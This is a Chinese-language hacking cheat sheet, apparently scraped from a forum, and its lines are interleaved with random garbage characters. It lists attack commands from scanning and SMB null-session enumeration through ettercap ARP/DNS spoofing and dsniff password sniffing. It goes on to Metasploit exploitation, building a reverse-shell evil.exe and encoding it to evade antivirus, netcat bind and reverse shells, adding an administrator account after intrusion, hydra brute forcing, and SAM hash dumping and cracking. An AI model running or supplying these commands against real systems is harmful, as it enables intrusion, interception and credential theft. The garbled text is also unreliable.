whois 域名/ip 查看域名的详细信息。/ \6 _* @ m, O- m8 V" a9 G
4 a) } i5 a0 {. ~- w! `
ping 域名/ip 测试本机到远端主机是否联通。
# s. e7 P/ V! I0 {' B7 h7 ^5 i" @
3 P3 x. B1 L: hdig 域名/ip 查看域名解析的详细信息。
0 m7 f5 ?+ h- T* W! A/ R $ }0 [5 X9 F2 d
host -l 域名 dns服务器 传输zone。' H! k0 k9 f& V7 N% f" x+ f
) N6 G$ ~+ |/ U- s B: y扫描
]5 t: x6 | W9 V- ?: x " D% D( I4 {3 n* f* _
nmap:
; v# i: R/ o/ z. d : m; r% j% Y4 U7 ]5 s
-sS 半开扫描TCP和SYN扫描。* }$ f) D/ R9 _/ I# _, `. Q. b
" N& r% v6 h$ t9 w& r; p5 f
-sT 完全TCP连接扫描。( t5 f5 p& d! @' a" U$ j/ P
% j8 L$ |6 S3 |9 B7 b& P0 m
-sU UDP扫描( ?2 t0 L x& R) q% ~. a. ~8 X
. X: |7 z" c5 W6 y! W7 j-PS syn包探测(防火墙探测)
; h' s! ^. w) c; O3 a* H7 |, O + p% y5 E. @: a% O5 x; r1 j
-PA ack包探测(防火墙探测). U! N3 A; ^4 e1 L! v
1 ~5 D$ q0 S+ t' F
-PN 不ping。
7 t. N x! q' _
Q" u* G8 V6 I( I-n 不dns解析。7 ~$ ^% d7 ]* e, J& N' j5 F: I- \
5 b7 c# I$ a+ E$ p/ Y [$ ]. |-A -O和-sV。 A1 b- ?6 v; {; g
. ]+ o! G5 p: z# ^
-O 操作系统识别。
2 [1 i& X1 ]" P; Z% m: e( Q" k 0 ~: \5 B0 y1 l5 d/ \9 y( A, S" O
-sV 服务版本信息(banner); u; I; { s. u
0 q1 _: }- G8 `! a4 `. F6 t-p 端口扫描。6 H7 M: s( n0 V, {
* k% l% b# b, Z6 g+ f3 i
-T 设置时间级别(0-5)
* K& s' |' H* O; m5 g . x1 M0 h" k! n4 d4 p
-iL 导入扫描结果。8 ~4 D( v0 z+ L6 _/ M- a, c
4 }" Z1 i* K1 V, x
-oG 输出扫描结果。
( L R: j, [8 W4 a
% Z* P5 b; R4 _5 M2 N 3 x% c9 q1 z; g; l& g
9 B1 c' k; B) [$ F* _$ e
操作系统识别:5 s9 S, ]( B* |1 f# {
, e; y9 c4 z' p; Jp0f -i eth0 -U -p 开启混杂模式。
}7 X4 Z: @) U. i
; _# ]. Z3 q+ X; _/ Mxprobe2 ip|域名 检测os。
8 ~; c3 ]" B7 `8 I
: g, m! r E* H5 @5 ^banner获取:
* t: r' Q# O1 F ! O! _! h+ T# Q* g$ I! {' h7 z
nc ip port 检测端口是否打开。: l6 b. y! E% _* u* B% _
( c' F/ u; @) I
telnet ip port 检测端口是否打开。5 Q! u+ M6 Q2 g* [3 Z% M
5 Z! G5 }0 J! X% b" Nwget ip 下载主页。5 e0 g- Z8 z: s, |" E
3 C1 w1 P9 W8 ncat index.html | more 显示主页代码。9 j( {( b: x: R5 s7 Y
0 d% c2 G) Q# F1 P. m2 z8 M
q 退出。
; H0 v5 U& H0 a! J2 _) d
' \) j6 \3 w: I& k9 s) Qwindows枚举
" Z& n' D( Z* ^7 Y
' b( O+ G: m3 Vnmap -sS -p 139,445 ip 扫描windows。
. L0 l$ _" @( Q/ z0 k* H* P
3 s0 K! M. m3 P% v6 w" K( wcd /pentest/enumeration/smb-enum - a3 }# Y& U1 M' a/ @
6 \+ P, B1 F0 I( Q( Z3 Enbtscan -f targetIP 检测netbios。& X; x0 O$ W1 ?0 p
+ \7 {7 F9 c( B2 w1 \
smbgetserverinfo -i targetIP 扫描name,os,组。# K6 |' j# O, d: _" s
+ }! |: K1 u4 b, f$ o
smbdumpusers -i targetIP 列出用户。3 v/ T/ I! B/ m2 a/ w, {* ^
0 ?4 d% R2 E" w( |( a* ?* T' msmbclient -L //targetIP 列出共享。# M+ h/ G( u! j% v+ v0 j- w
. c4 J* q+ T( e; M" b! z3 r" U
使用windows:
9 F9 X" f* P! l ' _; O! ]1 _2 o7 B2 v
net use \\ip\ipc$ "" /u:"" 开启空会话。, j! S$ U* ~7 I
1 K! h+ i4 @$ r8 U4 ^- unet view \\ip 显示共享信息。4 _% W# s1 @& S3 ~
% L% b4 f- @" x- h/ P3 r' ~: u$ [$ Ssmbclient:
# Q2 I4 W* Y) `! D: C" I
8 r% i% h: e. X5 F% ]5 j9 g; tsmbclient -L hostName -I targetIP 枚举共享。' g' L, q6 n. z
/ k y9 Q* F% f. N
smbclient -L hostName/share -U "" 用空用户连接。' s" M+ q/ M( P/ H
. m1 ~ [+ K4 p) c# m& ]; C
smbclient -L hostName -I targetIP -U admin普通用户连接。, K) E3 v0 t6 Y
% {& ^7 C6 Y# K
rpcclient: - n! {% N# j9 F3 O2 E
: R+ a- D, V8 h3 ~! j, v% o3 p$ {- d
rpcclient targetIP -U “”打开一个空会话。, ^7 Z0 [1 E- `2 l! ^
5 d8 `3 U' c+ U" w L" ~3 F2 |netshareenum 枚举共享。
: T2 ?& L& j0 o+ n. Y" o! y1 ]
0 i n4 ]% P* k7 i9 ~) @& n- H: i; Fenumdomusers 枚举用户。
5 h3 B; c- G/ N0 {& i+ @
' S9 h/ V: \& j1 Q2 s- M- C) O1 P2 i' wlsaenumsid 枚举域SID。6 e9 {6 d# k! l! H; M
$ h) {! a" W4 y2 F& Z- b+ t
queryuser RID 查询用户信息。
' g n) E a, b& F: \2 X' p- _
# N2 Z+ s6 \1 a: n: V: M2 ^createdomuser 创建用户访问。
. ?. o; h4 J' M! X
% _$ {: ]/ a* R- v2 S4 H7 rARP欺骗:( W7 \4 x* `4 z! k6 |. v
" j* U- ^$ ?# W2 z( z! H U. y- t
ettercap:
$ M. w4 J4 Q, J * q* p: X& @: T( t8 J* {5 R2 [
nano /usr/local/etc/etter.conf配置文件7 Q3 m- C* @1 j8 h! Z) [
: ~) T1 T7 ?7 z# f; C
Sniff > Unified sniffing > Network interface: eth0 > OK 设置抓包的网卡
( W6 M" \- O) s0 r. X% m* F3 k H3 A 4 e2 Z: i& Y+ E
Hosts > Scan for hosts (do this two times)扫描网段的主机
# G Z5 U3 N3 [0 L$ X: q' N" G
7 o, V! o* H* {: W( qHosts > Hosts list 显示主机列表- H {* P8 }; i$ ~7 v! M3 U
8 ?6 S6 m0 N& o" O) ]: h E
Select the default gateway > Add to Target 1 添加主机
5 I G! i# @- K0 n 4 D7 [8 Q, d% G$ R5 P8 {
Select the target > Add to Target 2 添加主机
( X( P) ^$ N9 l+ x 0 ?2 ^5 t' a% R* { g4 }
Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP攻击% @" a9 e" ? {5 o
: I7 o5 @! ?0 z# N) gStart > Start sniffing 开始攻击5 |) H8 S/ |% }: F
! w7 M: [+ h7 T
dsniff -i eth0 监听网卡窃听登录用户密码
) u Y" ^: E5 e& q: |# {
2 K( l/ Y$ x7 U3 p8 c4 Zurlsnarf -i eth0 嗅探http请求
6 v, C7 a$ J# _# _# S" ^' s* j 5 `8 Q4 m5 Y' M9 h" B6 H
msgsnarf -i eth0 嗅探聊天软件的聊天内容
9 [" K! J' G5 C6 `
' H- C; W, ^, R1 S' J7 Z& p: Vdriftnet -i eth0 网络管理嗅探图片,音频。, e9 p7 W( z$ K) A5 L
9 {: ]# i5 _" _6 f' }4 t4 m
nano /usr/local/share/ettercap/etter.dns编辑配置文件2 t# Q6 N3 x, P
9 V a6 I8 r& k* x! q0 [ R: Y
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
( ?& W L. j3 w1 O+ ]& O3 X
% K8 F8 ]6 q6 C, @' p- N- MMitm > Arp poisoning > Sniff remote connections > OK 设置ARP7 o" v0 F$ q# M4 p1 T4 L
+ V8 t: q _+ l* h* d
Start > Start sniffing 开始攻击# |+ T' D M6 }, m3 @0 \( C5 {; x
$ ]; j* W$ y. m1 @0 l# p
5 b) @3 k6 w* [
9 t" w- p8 T3 lExploits漏洞利用:
2 _) L) d7 J- N8 r; f 0 x9 {7 K/ X' c, ^ {- ~" | h
cd /pentest/exploits/exploit-db 进入目录 ' S+ M7 A4 D* X/ M6 h
# f' L! p4 O6 o2 E5 ^5 S* i5 J
cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
3 c ~# z `. A1 F: Q1 ~- \8 [
2 ^& F9 T8 J% t3 m5 Jcat exploit | grep "#include"检查运行环境# o$ s4 Z% r6 H& M, R3 {
z7 v3 j4 Z# E4 I" [
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码( ~1 T3 W! P0 ^. X3 d$ i
9 n5 H6 ?8 V9 `: h) j& u
6 y$ n; v+ q c4 D . ], X0 K! D$ U; w [) k1 S
Metasploit:
# J1 N! F8 ]; Z5 ]' [6 l
1 X; m) g& s' z* N; U, N3 Ksvn update 升级 - z }1 [! M/ ?* X4 n- _
" {, M n# h9 E( f! y
./msfweb Web接口127.0.0.1:55555。.
. A: c. t2 J: F4 F , o- b- r3 _9 `1 V' _$ Q8 p" p
./msfconsole 字符下的Console。# u9 |4 D1 Z1 J' _( C
0 r* v% e. x& W, yhelp 帮助# ?: u4 c% E' X
& o8 P R( T I% o# Mshow <option> 显示选项9 q# T2 p. [! S5 g0 F7 g
6 R8 V" U9 e2 S8 }/ a7 T. N
search <name> 搜索名字
3 _9 T0 g: {" p2 Z @* @ S, a' b- Q- H- ~- H1 @ N
use <exploit name> 使用漏洞
3 f/ i: K9 {7 ~( A
+ P9 U& w3 C$ w: U Gshow options 显示选项
B0 F& d0 R& X) r6 A
0 b6 W) R$ D. G6 M! {7 Q* e% t- Uset <OPTION NAME> <option> 设置选项
% m4 R: C5 L* L( |" A5 ]; u. l) t
% h% X# o- T5 F2 G+ Q* Dshow payloads 显示装置. h0 L! _: R- p. j
5 ~2 ]& _- I* m w! n& a0 ?) U
set PAYLOAD <payload name> 设置装置
( b, z6 f* ^# w: l8 x, ^ 4 l; t! g: p( j s0 J C& b
show options 显示选项
' p; c. r* f" X# s- T
7 M3 `( h" p( o& Y1 F' y" ]set <OPTION NAME> <option> 设置选项6 E. t- `3 x' b! p& w2 S
! r& G6 ~: N3 ~show targets 显示目标(os版本)( J/ _/ i$ Y2 x% F
3 n: D& L. ?5 X$ R2 vset TARGET <target number> 设置目标版本
% S$ H7 R+ l) x' S* |' r* o1 i
' C; o3 C" Q2 z- M0 q8 |) N3 k7 gexploit 开始漏洞攻击: v9 s( y4 C V; N2 G
" b r; c4 v5 B
sessions -l 列出会话3 Y, |* C6 G$ G' K7 U9 e( f
6 T# o2 S* b! r) |' O4 q
sessions -i <ID> 选择会话 h$ g( T* h* n9 ~3 i
' w, Y6 T( w3 ]3 o4 S1 Psessions -k <ID> 结束会话* e% ]0 D$ T5 m1 O8 M
, _$ l) @) ]2 y; k: U- w7 {# |<ctrl> z 把会话放到后台
2 A7 Y) [; V' I
' R) G/ Q* W [4 l<ctrl> c 结束会话0 @; H ^0 Y9 s5 h/ z* `8 D; G1 V
/ ?* _ l5 B. }5 z2 {5 x' n1 Fjobs 列出漏洞运行工作" Z8 ?7 w9 S" o1 Z+ F& j+ {$ g* g
3 p% A0 r: z) c3 E- sjobs -K 结束一个漏洞运行工作
- f/ I) O# `9 j( W, d; Y( k * A; A# e2 t. z7 W- h
show auxiliary 显示辅助模块4 k2 i% ~' o: g, `
6 S/ _ X' y; y0 L% h; R
use <auxiliary name> 使用辅助模块
' J M$ _, \7 ^* g& C + U' |! A" q+ o1 H6 a$ R! g
set <OPTION NAME> <option> 设置选项
8 F* Q% k( n! U" d- ~) R
7 A1 Z+ G" Q: x Crun 运行模块1 P, l* |3 J8 N) [5 Y. M
7 c! d. Q5 J2 y
scanner/smb/version 扫描系统版本/ u4 O) B _6 H5 ^+ p
! v; `7 ~$ p4 J) T$ }3 [2 ]( Oscanner/mssql/mssql_ping 测试mssql是否在线' N, K. h, x6 N
0 U/ [/ y( P2 P k: y6 S. Dscanner/mssql/mssql_login 测试登录(暴力或字典)
, U9 f9 e6 |5 y. r" _ 3 g+ q+ n4 i1 M& z/ l9 }9 g
Attacker behind firewall: bind shell正向. ]: |% t9 p8 W0 s
# P8 I' t- ] D5 }
Target behind firewall: reverse shell反向
Z; B3 J- R% {/ m6 G( u' S
, Q L+ Z# I* xMeterpreter衔接不懂dos的可以用这个:% @4 N8 P! ^' T3 U; q2 j8 A
( Q- P) A9 X( `db_import_nessus_nbe 加载nessus的扫描结果, t( v' w! S& D8 ~ _ |" q
3 \: b5 i* p* v6 g5 @4 u1 ]db_import_nmap_xml 加载nmap的扫描结果. f2 ], I& q) X
3 c8 D: Z. k1 I1 j
自动化攻击流程:$ i5 Y3 v3 \" r
( B3 ~- s5 x( n" {9 ^cd /pentest/exploit/framework3 : ]6 |! {9 v+ w, v: Y
" }9 P7 s o8 m./msfconsole
|6 c% ` b o- ~6 U! y5 v* v
" n3 H. u y& C% oload db_sqlite30 S' R; b: D6 k3 J4 I
2 F& T2 x, F( Z/ w, Z& ?. D3 sdb_destroy pentest* M: `: t- I3 g6 M
. Q9 }5 z4 N/ |7 r+ y
db_create pentest5 b7 c. @% l4 y' M. T, ^8 p, p
4 P4 y4 K- J/ W6 v$ k2 e9 idb_nmap targetIP K) F# g6 F7 {: }0 F8 A( |
2 c% }9 C6 w- `
db_hosts, b1 h) G& b" Q
7 ^, T _7 V0 F; [" r" V: {/ zdb_services# t9 F) c4 L) F7 R! [
9 K7 e1 R- d* ^- N) J
db_autopwn -t -p -e
( N7 T9 V6 w0 B. {0 i % L7 E+ F/ W/ i! Z# D& q
字符接口攻击流程:
8 E& W" I( W* c: A* p
& P* ^- P/ O7 r1 n./msfcli | grep -i <name>
4 o {* A9 Y" x. C2 Z! E
3 w! \ N! Q( ?4 c/ A./msfcli <exploit or auxiliary> S
( D* O: d8 f2 v: w+ U) m( a , }: q( v$ u( b7 D4 P, R" G
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E% p9 p% [+ {* s/ q# s/ ?" }
+ [* r. q# J& b6 H& E
做木马后门等:
% Q% {$ ^, O* J; H5 L; e
) i1 ]; r8 w W+ x, q./msfpayload <payload> <variable=value> <output type>+ [1 n, X" t; K
9 C) h" L0 y9 m
S summary and options of payload; ~' r: M ~6 W. E/ k% Z6 Y
3 c! Z0 o. @# r1 ~$ c' h
C C language
' R0 ?! U, P* I$ ?7 q7 z! \
6 h1 n* Z- \$ P9 y: hP Perl
" X1 w- L7 l8 {
0 u5 e0 N" K. g+ ]0 my Ruby
: Y. O7 I- m# k [ c & H( Z! q2 O$ `5 x
R Raw, allows payload to be piped into msfencode and other tools
# ]/ ~; F. ?5 |& v4 w$ I3 u 9 C4 N. n( h3 E' s2 v7 l
J JavaScript# I) P; v/ D! F& Z, K- ]
8 ], [$ ]5 u7 KX Windows executable
! y3 ^3 B a/ p
7 a! i& [' {2 u/ _9 u./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C$ [. ]# }- w3 I2 o: r
! Z0 ?0 v2 x5 U& X+ z./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe0 G* L3 G5 f4 \- ^
, J; W; D# F/ ^! j$ j" ~8 z
编码处理就是做免杀:: q& {) W7 h: p. `
# B4 G8 U M6 r' c" ?' s./msfencode <options> <variable=value>" H6 W% @* e2 u9 j/ e d' i
* k; `% u4 y) |, [+ s& \8 \& A
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l2 J N- I" k5 j$ m
, t- T7 @& O% N& f* ?
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c7 d; g2 Q- m9 Q) j3 A3 M( j
C, J4 [9 K# x! R8 I' ^0 s
+ m5 w) {# n' |; }( n: L) U , R6 d1 S; W) L
入侵后在windows下添加管理员用户:
# g3 K/ n! A* X
' F& |7 A& r8 y m$ [% t7 _hostname 查看主机名0 C) U1 F2 w$ o
6 \) y2 t1 B/ s# j! rnet users 查看用户, s- x1 {+ K @( m+ r
% x6 [* v" d) d6 Y: A5 snet user 用户 密码 /add 添加用户
0 _* M" `* ^# v! p5 k& g& @* G ! w. ^( S5 s, r R% d8 \) b
net localgroup 查看工作组
8 S$ B$ q9 n. p& U' \& }
( D$ v0 D* |; R9 [net localgroup administrators 查看管理员组
3 K, E: }4 O5 @: C' v, A ; Q7 S) t) z% |6 m) {- ], p- M
net localgroup administrators x /add 将用户加入管理员组
: g( M6 [5 O+ E } 7 u. u- w2 A- w4 P
- U( z4 P% ?* Y! ^7 c
) l) c+ P) j5 a; BTFTP7 F' s( Y& e+ V! Q" @
( t/ e7 `, Q/ H, j% n# D2 acp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上8 ^5 x* c; \+ h/ F; w" M- h
' _! S3 W: j, H+ Itftp -i 10.1.1.2 GET nc.exe下载3 @/ |8 c7 M2 D; v
- }' K* Q6 x! r* b) q9 znetcat瑞士军刀
. Y! C( i. J D$ C% K. C
5 S3 ]% l( F6 A# b7 k x' ]7 kattacker: 10.1.1.1 ' O" ]& @9 f) B7 u
" C: |' b+ ?% U4 q% C4 P" a7 ?
target: 10.1.1.2' K/ w6 E/ [9 @8 m) k" N" T
7 K4 _; l. t: U) W' lnc -v -z 10.1.1.2 1-1024 端口扫描" s. s2 u" t$ G) _* A% P, L
6 n! \$ k6 Z4 t1 H* ] A; f4 f0 D* \
target: nc -lvp 4444 聊天设置(服务)
9 [* N i" Z& X1 {/ A% z& T) x7 g# Z6 Z }6 @# }0 a9 j$ I) x5 Q2 @9 b
attacker: nc -v 10.1.1.2 4444 聊天设置(客户)4 G6 m& B) z2 H( [' K. R( B
4 ~4 e9 A5 ~ C% ?9 t6 ^) A+ v$ C5 B+ ntarget: nc -lvp 4444 > output.txt传输文件(接受)' _$ G2 j+ o7 n1 \% p3 B
0 W5 f% Z* h8 `4 g# k4 kattacker: nc -v 10.1.1.2 4444 < test.txt传输文件(发送)
; N2 k/ C S, q8 w
, T3 @+ J+ I7 r% W0 q; Ztarget: nc -lvp 4444 -e cmd.exe Bind shell。
" ^3 ?/ Q b3 g" k % A: s, O5 ]# v4 m2 F. n$ T* D' T
attacker: nc -v 10.1.1.2 4444
: D4 _6 ^2 ]8 ?3 Q, ^* k
5 R" a* |6 o* q8 b8 ztarget:nc -lvp 4444 Reverse shell。
4 a: V" h& H! u' Y/ O g4 G5 B, [: A- P0 P8 K4 Q
attacker:nc -v 10.1.1.2 4444 -e /bin/bash
. K6 U: _; Q8 F9 F
" B1 G9 D/ o' c0 M7 H/ w * X \" v3 M$ K8 C9 \; {
l( S4 i8 `! F0 j
密码$ n d8 Z% G. ~$ n
% h/ L4 z9 C/ f3 a3 W( N9 V字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words d( C) k7 F# ^. ]+ b- l m% q
/ Y* f: _4 N) `; gcat words | wc -l显示个数(30多万个) 2 a! r) H& i3 E6 l% B
8 U$ W$ P! V7 K, O. K( {8 ?2 {
暴力:
0 Y) I2 e. H5 I) ? & k. a9 w2 u; \/ G; @9 r
hydra -l ftp -P words -v targetIP ftp 攻击ftp。
* Y1 H+ B7 k( `( u/ y & K, I+ }8 R1 ~5 g7 d: ]% J! \
hydra -l muts -P words -v targetIP pop3 攻击pop3
/ B1 g) M8 x5 c9 u* P 9 s q) M+ F9 `. z# a" Q
hydra -P words -v targetIP snmp 攻击snmp
9 l- A. K) m4 L+ w' y
+ A0 |8 ?1 w% I) j9 l攻击microsof VPN
% ^, [5 p0 L$ d' m8 q7 } ) Z1 f& H3 R, C) i* L+ O* B1 V
nmap -p 1723 targetIP
: I, e0 g. r( b, Y0 l! g3 P) Q 0 U: n4 ^+ }0 i6 P: Y1 q
dos2unix words9 l5 ` o+ d. p! x
# V4 O- S& G8 ?, Z2 Ocat words | thc-pptp-bruter targetIP y5 P9 G1 T& Q) V1 e
% f5 J4 c' Z' A3 u/ M& H
WYD:3 p5 n" X5 q' V5 P7 T
$ M( [8 x9 ?( p& z$ S$ l! n- awget -r www.target.com --accept=pdf 下载pdf文档
/ k8 z! B: F3 }. T) R) A
I# Q' s& F! E2 k2 iwyd.pl -o output.txt www.target.com/8 o5 ?# Z& f) S' S) b; m+ n! O
; B1 D1 E# a9 q. Z, j' Vcat output.txt | more
: Y% j4 C1 V! P, r/ F- ^& A * U* t" `0 G$ X* ?1 @# C$ X1 D
SAM文件(windows下的密码文件):
2 s* x o+ }* L P0 o$ v2 _, J$ ] $ g4 n( a7 p% u( _4 ], Y5 O
%SYSTEMROOT%/system32/config
3 _7 d7 V$ Q4 ~$ d) E6 W& j7 D
( {( }" ^! Y/ r$ d0 t# I: F) O%SYSTEMROOT%/repair
: ?, r8 }% f5 ^# I1 s5 M- d& H8 Z 3 z! ~1 l- r3 m8 l( O
备份windows的hash文件:: g$ } r7 @$ i3 n8 v
- b/ l( a2 F% t./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E! B! J3 P# i+ J" ~/ f {. o/ t
6 F, F! ?, h7 h. N
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
9 a& r( ] P9 o, y7 E, P: N & W+ f2 n/ ~6 R% ^% Q
meterpreter > execute -f cmd -c0 B7 @' o/ Z0 |6 j- h
* e1 M" A1 m Q9 o. n! nmeterpreter > interact x
" O$ O: S4 K) p& q
' v1 D$ F0 H& C+ x: c1 cC:\WINDOWS\system32> pwdump \\127.0.0.1
a" u, q* a. E" U' M
1 W# g, M( z" c4 e7 O) s5 Pjohn破解密码:9 h# x, |6 A; I |8 c7 v
2 B7 \# r, h& R: q2 p* x/ R
cp hash.txt /pentest/password/john-1.7.2/run/
, z; p2 W3 J# @9 Y- J/ O5 ? ~" c4 | 7 @0 ~1 y1 N! {4 G
cd /pentest/password/john-1.7.2/run/; c& H, _3 k5 [( I6 p" @: o
; V q% ?& F' h* {2 g5 {: I: }./john hash.txt
: g9 ]7 y6 v% }( {+ t8 U
. K7 V! z- }# ]& H彩虹表:
, X6 m" ~. i7 t$ P! W1 g1 C( s
; n. M2 ?9 E7 T1 wrcrack *.rt -f hash.txt
" ]3 H. V/ h! u4 p! V; O! o
* t. U2 Y) ]( H; W 6 {: K% V5 `2 P; O- f/ d4 }
5 U4 q9 R2 A. _
本地修改密码:
6 Z* E# T$ Z$ V8 V" b / j* n4 ?2 r" A7 ?: M
mount, ^' Q7 r5 q7 h, m
1 C' ?5 N8 v- a( |
umount /mnt/hda11 ~0 b7 v! b1 d4 { s9 L
* u p( P1 i x4 P+ l* m3 |1 K
modprobe fuse
7 _- Y2 ?8 Q- J) w. D& z; p * S }/ U' E. h
ntfsmount /dev/hda1 /mnt/hda1
1 F1 i$ u* e0 K/ J( i % K1 U. h% V+ Y5 O4 F6 I
mount |
|
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
